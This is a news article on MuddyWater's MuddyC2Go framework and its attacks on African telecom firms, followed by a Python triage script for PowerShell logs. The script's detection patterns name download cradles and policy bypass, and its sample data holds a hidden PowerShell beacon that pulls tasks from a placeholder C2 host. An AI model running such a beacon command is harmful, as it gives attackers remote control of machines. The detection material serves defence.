
Cyber Warfare fragments: attacks in Africa with MuddyC2Go

Under the radar: operational tactics and emerging tools of the MuddyWater group

Iranian hacker group MuddyWater has strengthened attacks on telecommunications in Africa, via a new system called MuddyC2Go. This system, managed remotely, facilitates cyber attacks and spreads through phishing emails or by exploiting vulnerabilities in outdated software. MuddyWater will try to remain undetected for as long as possible to achieve its goals.


An Iranian state actor known as MuddyWater has stepped up its attacks against the telecommunications sector in several African countries, employing a new command and control (C2) platform called MuddyC2Go. Also identified as Seedworm, and with other aliases such as Boggy Serpens and Cobalt Ulster, the group allegedly operates under the orders of the Iranian Ministry of Intelligence and Security (MOIS). The attacks are predominantly concentrated in the Middle East but, as reported by the Symantec Threat Hunter Team, have recently spread to Egypt, Sudan and Tanzania.

Features and usage of the MuddyC2Go framework

The MuddyC2Go framework, written in Golang, was first identified by Deep Instinct as a successor to PhonyC2 and MuddyC3, although there are hints that it was in use as early as 2020. While the full breadth of its capabilities is not yet clear, it comes with a PowerShell script that connects automatically to the C2 server managed by Seedworm, giving the operators remote access to the compromised system without manual intervention.

Operational methods in recent attacks

Attacks observed in November 2023 combined legitimate tools such as SimpleHelp and Venom Proxy with custom keyloggers and other publicly available tools. MuddyWater's attack chains begin with phishing emails and the exploitation of known vulnerabilities in outdated applications, then continue with reconnaissance, lateral movement and data collection inside the victim networks.

MuddyWater's strategy: innovation and evasion

By mixing proprietary tools, living-off-the-land techniques and public tools, MuddyWater aims to evade detection for as long as possible while pursuing its strategic goals. Symantec highlights the group's constant innovation and development of its arsenal to remain covert, and points to heavy use of PowerShell and related scripts as an indicator of suspicious activity. In parallel, an Israel-linked group known as Gonjeshke Darande ("Predatory Sparrow" in Persian) has claimed acts of cyber sabotage affecting most gas stations in Iran, in response to regional aggression by the Islamic Republic and its affiliates.
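Symantec's observation above, that heavy PowerShell use is itself a useful indicator, can be turned into a simple hunt over PowerShell Script Block Logging text (Windows Event ID 4104). The following is an added example, not code from the article or from Symantec: the log records, the indicator weights and the `c2.example.invalid` host are constructed for illustration, and the patterns are generic hands-on-keyboard PowerShell tradecraft (hidden window, policy bypass, download cradle, sleep loop), not anything specific to MuddyC2Go.

```python
import re
from typing import Dict, List

# Indicator name -> (regex over the script block text, illustrative weight).
# Weights are an assumption for this example, not a published scoring scheme.
INDICATORS = {
    "encoded_command": (re.compile(r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    "download_cradle": (re.compile(r"Net\.WebClient|Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile", re.I), 3),
    "hidden_window": (re.compile(r"-w(indowstyle)?\s+hidden", re.I), 2),
    "policy_bypass": (re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass", re.I), 2),
    "raw_socket": (re.compile(r"Net\.Sockets\.TcpClient", re.I), 3),
    "beacon_loop": (re.compile(r"while\s*\(\s*\$true\s*\).*Start-Sleep", re.I | re.S), 2),
}

# Constructed 4104-style records: two routine admin commands and one script
# that silently polls a remote host in a loop, the shape of an auto-connect stager.
SAMPLE_EVENTS = [
    {"record_id": 1, "host": "ws01", "user": "alice",
     "script": "Get-ChildItem C:\\Reports | Sort-Object LastWriteTime"},
    {"record_id": 2, "host": "srv-tel-02", "user": "svc_backup",
     "script": ("powershell -w hidden -ep bypass -c \"$c=New-Object Net.WebClient; "
                "while($true){ $c.DownloadString('http://c2.example.invalid/task'); Start-Sleep 60 }\"")},
    {"record_id": 3, "host": "ws07", "user": "bob",
     "script": "Get-Service | Where-Object Status -eq Running"},
]


def score_script(script: str) -> Dict[str, int]:
    """Return the indicators matched by one script block and their weights."""
    return {name: weight for name, (pattern, weight) in INDICATORS.items()
            if pattern.search(script)}


def triage(events: List[dict], threshold: int = 5) -> List[dict]:
    """Flag records whose summed indicator weight reaches the threshold.

    Single weak hits (e.g. a lone -ep bypass in a deployment script) stay below
    the bar; the combination of several is what raises an alert.
    """
    alerts = []
    for ev in events:
        hits = score_script(ev["script"])
        total = sum(hits.values())
        if total >= threshold:
            alerts.append({"record_id": ev["record_id"], "host": ev["host"],
                           "user": ev["user"], "score": total,
                           "indicators": sorted(hits)})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

In a real deployment the same scoring would run over exported 4104 events (for example from a SIEM query), with the benign-looking admin records serving as a check on false positives.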


12/19/2023 12:28

Editorial AI
